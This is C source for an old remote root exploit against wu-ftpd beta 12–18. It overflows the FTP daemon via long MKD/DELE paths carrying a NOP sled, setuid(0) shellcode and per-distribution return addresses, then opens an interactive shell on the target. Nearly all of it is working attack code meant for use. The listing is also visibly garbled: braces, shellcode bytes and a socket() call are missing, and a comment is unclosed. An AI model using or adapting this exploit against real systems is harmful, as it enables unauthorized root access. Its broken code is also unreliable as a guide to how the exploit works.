 * Remote/local exploit for wu-ftpd [12] through [18]
 * gcc w00f.c -o w00f -Wall -O2
 * Offsets/padding may need to be changed, depending on remote daemon
 * compilation options. Try offsets -5000 to 5000 in increments of 100.
 * Note: you need to use -t >0 for -any- version lower than 18.
 * Coded by smiler and cossack
#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <stdarg.h>

#include <unistd.h>

#include <errno.h>

#include <sys/socket.h>

#include <sys/time.h>

#include <netinet/in.h>

#include <netdb.h>

#include <arpa/inet.h>

/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */ 
unsigned char hellcode_a[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */  

unsigned char hellcode_b[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */  

char *Fgets (char *s, int size, FILE * stream);

int ftp_command (char *buf, int success, FILE * out, char *fmt, ...);

int double_up (unsigned long blah, char *doh);

int resolv (char *hostname, struct in_addr *addr);

void fatal (char *string);

int usage (char *program);

int tcp_connect (struct in_addr host, unsigned short port);

int parse_pwd (char *in, int *pwdlen);

void RunShell (int thesock);

struct type
unsigned long ret_address;
unsigned char align;	/* Use this only to offset \xff's used */
signed short pad_shift;	/* how little/much padding */
unsigned char overflow_type;	/* whether you have to DELE */
char *name;

/* ret_pos is the same for all types of overflows, you only have to change
   the padding. This makes it neater, and gives the shellcode plenty of
   room for nops etc
#define RET_POS 190 

#define FTPROOT "/home/ftp"

/* the redhat 5.0 exploit doesn't work at the moment...it must be some
   trite error i am overlooking. (the shellcode exits w/ code 0375) */ 
struct type types[] = { 
    {0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)",}, 
  {0xbfffe30e, 3, -28, 1, "BETA-16 (redhat 5.1)",}, 
  {0xb2ffe356, 3, -28, 1, "BETA-15 (redhat 5.0)",}, 
  {0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)",}, 
  {0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)",}, 
  {0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)",}, 
{0, 0, 0, 0, NULL} 

struct options
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;

/* Bit of a big messy function, but hey, its only an exploit */ 
main (int argc, char **argv) 
char *argv0, ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen, ctr, d;
FILE * cin;
int fd;
struct in_addr victim;
argv0 = strdup (argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt (argc, argv, "cs:o:t:")) != -1)
switch (d)
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
case 's':
strcpy (opts.start_dir, optarg);
case 'o':
opts.offset = atoi (optarg);
case 't':
opts.t = atoi (optarg);
if ((opts.t < 0) || (opts.t > 5))
printf ("Dont have that type!\n");
exit (-1);
argc -= optind;
argv += optind;
if (argc < 3)
usage (argv0);
if (!resolv (argv[0], &victim))
perror ("resolving");
exit (-1);
strcpy (opts.username, argv[1]);
strcpy (opts.password, argv[2]);
if ((fd = tcp_connect (victim, 21)) < 0)
perror ("connect");
exit (-1);
if (!(cin = fdopen (fd, "r")))
printf ("Couldn't get stream\n");
exit (-1);
Fgets (inbuf, sizeof (inbuf), cin);
printf ("%s", inbuf);
if (ftp_command (inbuf, 331, cin, "USER %s\n", opts.username) < 0)
fatal ("Bad username\n");
if (ftp_command (inbuf, 230, cin, "PASS %s\n", opts.password) < 0)
fatal ("Bad password\n");
if (*opts.start_dir)
if (ftp_command (inbuf, 250, cin, "CWD %s\n", opts.start_dir) < 0)
fatal ("Couldn't change dir\n");
if (ftp_command (inbuf, 257, cin, "PWD\n") < 0)
fatal ("PWD\n");
if (parse_pwd (inbuf, &pwdlen) < 0)
fatal ("PWD\n");
srand (time (NULL));
printf ("Making padding directorys\n");
for (ctr = 0; ctr < 4; ctr++)
ltr = rand () % 26 + 65;
memset (outbuf, ltr, 194);
outbuf[194] = 0;
if (ftp_command (inbuf, 257, cin, "MKD %s\n", outbuf) < 0)
fatal ("MKD\n");
if (ftp_command (inbuf, 250, cin, "CWD %s\n", outbuf) < 0)
fatal ("CWD\n");
    /* Make padding directory */ 
ctr = 124 - (pwdlen - types[opts.t].align);	//180
  //ctr = 152 - (pwdlen - types[opts.t].align);
  ctr -= types[opts.t].pad_shift;
if (ctr < 0)
exit (-1);
memset (outbuf, 'A', ctr + 1);
outbuf[ctr] = 0;
if (ftp_command (inbuf, 257, cin, "MKD %s\n", outbuf) < 0)
fatal ("MKD\n");
if (ftp_command (inbuf, 250, cin, "CWD %s\n", outbuf) < 0)
fatal ("CWD\n");
memset (outbuf, 0x90, 195);
d = 0;
for (ctr = RET_POS - strlen (opts.shellcode); ctr < (RET_POS); ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up (types[opts.t].ret_address - opts.offset, ret_string);
strcpy (outbuf + RET_POS, ret_string);
strcpy (outbuf + RET_POS + strlen (ret_string), ret_string);
printf ("Press any key to send shellcode...\n");
getchar ();
if (ftp_command (inbuf, 257, cin, "MKD %s\n", outbuf) < 0)
fatal ("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command (inbuf, 250, cin, "DELE %s\n", outbuf) < 0)
fatal ("DELE\n");
    /* HEH. For type 1 style we add a dele command. This overflow
       occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
       not checking bounds correctly, overwriting path[] in delete(). */ 
RunShell (fd);
return (1);


RunShell (int thesock) 
int n;
char recvbuf[1024];
fd_set rset;
while (1)
FD_ZERO (&rset);
FD_SET (thesock, &rset);
select (thesock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (thesock, &rset))
n = read (thesock, recvbuf, 1024);
if (n <= 0)
printf ("Connection closed\n");
exit (0);
recvbuf[n] = 0;
printf ("%s", recvbuf);
n = read (STDIN_FILENO, recvbuf, 1024);
if (n > 0)
recvbuf[n] = 0;
write (thesock, recvbuf, n);


double_up (unsigned long blah, char *doh) 
int a;
unsigned char *ptr, *ptr2;
bzero (doh, 6);
ptr = doh;
ptr2 = (char *) &blah;
for (a = 0; a < 4; a++)
*ptr++ = *ptr2;
if (*ptr2 == 0xff)
	*ptr++ = 0xff;
return (1);


parse_pwd (char *in, int *pwdlen) 
char *ptr1, *ptr2;
    /* 257 "/" is current directory */ 
    ptr1 = strchr (in, '\"');
if (!ptr1)
    return (-1);
ptr2 = strchr (ptr1 + 1, '\"');
if (!ptr2)
    return (-1);
*ptr2 = 0;
*pwdlen = strlen (ptr1 + 1);
    /* If its just "/" then it contributes nothing to the RET_POS */ 
    if (*pwdlen == 1)
    *pwdlen -= 1;
printf ("Home Dir = %s, Len = %d\n", ptr1 + 1, *pwdlen);
return (1);


tcp_connect (struct in_addr host, unsigned short port) 
struct sockaddr_in serv;
int fd;
bzero (&serv, sizeof (serv));
memcpy (&serv.sin_addr, &host, sizeof (struct in_addr));
serv.sin_port = htons (port);
serv.sin_family = AF_INET;
if (connect (fd, (struct sockaddr *) &serv, sizeof (serv)) < 0)
return (-1);
return (fd);


ftp_command (char *buf, int success, FILE * out, char *fmt, ...) 
va_list va;
char line[1200];
int val;
va_start (va, fmt);
vsprintf (line, fmt, va);
va_end (va);
if (write (fileno (out), line, strlen (line)) < 0)
return (-1);
bzero (buf, 200);
while (1)
Fgets (line, sizeof (line), out);
#ifdef DEBUG

	printf ("%s", line);
#endif	/* 
	if (*(line + 3) != '-')
strncpy (buf, line, 200);
val = atoi (line);
if (success != val)
    return (-1);
return (1);


fatal (char *string) 
printf ("%s", string);
exit (-1);

char *
Fgets (char *s, int size, FILE * stream) 
char *ptr;
ptr = fgets (s, size, stream);
    //if (!ptr) 
    return (ptr);


resolv (char *hostname, struct in_addr *addr) 
struct hostent *res;
if (inet_aton (hostname, addr))
return (1);
res = gethostbyname (hostname);
if (res == NULL)
return (0);
memcpy ((char *) addr, (char *) res->h_addr, sizeof (struct in_addr));
return (1);


usage (char *program) 
fprintf (stderr,
	      "Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",
fprintf (stderr, "\t[-o offset] [-t type]\n");
fprintf (stderr, "types:\n");
fprintf (stderr, "0 - %s\n", types[0].name);
fprintf (stderr, "1 - %s\n", types[1].name);
fprintf (stderr, "2 - %s\n", types[2].name);
fprintf (stderr, "3 - %s\n", types[3].name);
fprintf (stderr, "4 - %s\n", types[4].name);
fprintf (stderr, "5 - %s\n", types[5].name);
fprintf (stderr, "\n");
exit (0);


/* -EOF- */ 

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